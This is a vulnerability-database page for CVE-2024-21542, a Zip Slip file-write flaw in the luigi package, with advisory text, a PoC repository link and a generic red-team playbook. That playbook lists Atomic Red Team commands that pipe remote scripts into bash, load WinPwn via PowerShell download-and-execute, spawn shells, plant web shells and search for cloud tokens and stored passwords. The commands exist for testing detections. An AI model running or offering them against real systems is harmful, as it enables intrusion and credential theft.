CVE-2024-21542
Overview
This vulnerability is a Zip Slip arbitrary file write flaw caused by inadequate validation of destination file paths during archive extraction. The issue resides in the _extract_packages_archive function of the luigi package prior to version 3.6.0. Specifically, the function fails to properly sanitize or restrict file paths extracted from archives, allowing path traversal outside the intended extraction directory.
Vulnerability Description
Versions of the package luigi before 3.6.0 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) due to improper destination file path validation in the _extract_packages_archive function.
Impact
An unauthenticated attacker able to supply a malicious archive to the vulnerable luigi package can write arbitrary files to any location on the host filesystem accessible by the process. This can lead to unauthorized file modification or code injection, enabling potential privilege escalation or system compromise. The attack requires no user interaction and can be executed remotely if archive input is externally controllable, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N.
Solution
Upgrade the luigi package to version 3.6.0 or later, where the _extract_packages_archive function includes proper destination path validation to prevent directory traversal. Refer to the official Spotify luigi GitHub commit b5d1b965ead7d9f777a3216369b5baf23ec08999 and the Snyk advisory SNYK-PYTHON-LUIGI-7830489 for detailed patch information and update instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from improper validation of destination file paths during the extraction of archived files, specifically in the context of the Luigi package prior to version 3.6.0. This flaw is characterized as an Arbitrary File Write vulnerability, which allows an attacker to manipulate the file paths within a ZIP archive. When the archive is extracted, the application fails to adequately sanitize the paths, potentially leading to the extraction of files outside the intended directory. This mismanagement of file paths can result in the overwriting of critical system files or the placement of malicious files in sensitive locations, thereby compromising the integrity and security of the host system.
Exploitation of this vulnerability can occur through several attack vectors. An attacker could craft a malicious ZIP archive containing specially crafted file paths that leverage the extraction process. When a user or an automated system extracts this archive using the vulnerable version of the package, the application unwittingly writes files to unintended locations. For instance, an attacker could place a payload in a system directory, which could then be executed with the privileges of the user running the extraction process. This scenario is particularly concerning in environments where the Luigi package is used for orchestrating complex data workflows, as it may run with elevated permissions, amplifying the potential impact of the attack.
The real-world implications of this vulnerability are significant, especially for organizations that rely on the Luigi package for data processing and workflow management. The risk extends beyond mere data loss; it encompasses the potential for unauthorized access to sensitive information, system compromise, and disruption of critical services. For businesses, the fallout from such an incident could lead to financial losses, reputational damage, and regulatory penalties, particularly if sensitive customer data is exposed or if the attack leads to a breach of compliance with data protection laws. The high CVSS score of 8.6 indicates that this vulnerability poses a serious threat, necessitating immediate attention from security teams.
To detect and mitigate this vulnerability, organizations should first ensure that they are using the latest version of the Luigi package, as updates typically include patches for known vulnerabilities. Regularly auditing and monitoring file extraction processes can also help identify any unusual file activity that may indicate exploitation attempts. Implementing strict access controls and permissions on directories where files are extracted can further reduce the risk of arbitrary file writes. Additionally, employing security tools that can analyze and validate the contents of ZIP archives before extraction can help prevent malicious files from being written to the system.
In conclusion, the vulnerability stemming from improper file path validation in the Luigi package represents a critical security concern that can lead to severe consequences if left unaddressed. Organizations must prioritize patching affected systems, enhancing their detection capabilities, and implementing robust security measures to safeguard against potential exploitation. By adopting a proactive approach to vulnerability management, businesses can mitigate risks and protect their assets from the evolving landscape of cyber threats.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
L3ster1337/Poc-CVE-2024-21542
|
L3ster1337 | 1 | 0 | 2024-12-15 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-21542 |
| security.snyk.io |
GitHub CVE
|
https://security.snyk.io/vuln/SNYK-PYTHON-LUIGI-7830489 |
| github.com |
GitHub CVE
|
https://github.com/spotify/luigi/issues/3301 |
| github.com |
GitHub CVE
|
https://github.com/spotify/luigi/commit/b5d1b965ead7d9f777a3216369b5baf23ec08999 |
| github.com |
GitHub CVE
|
https://github.com/spotify/luigi/releases/tag/v3.6.0 |
| github.com |
GitHub CVE
|
https://github.com/L3ster1337/Poc-CVE-2024-21542 |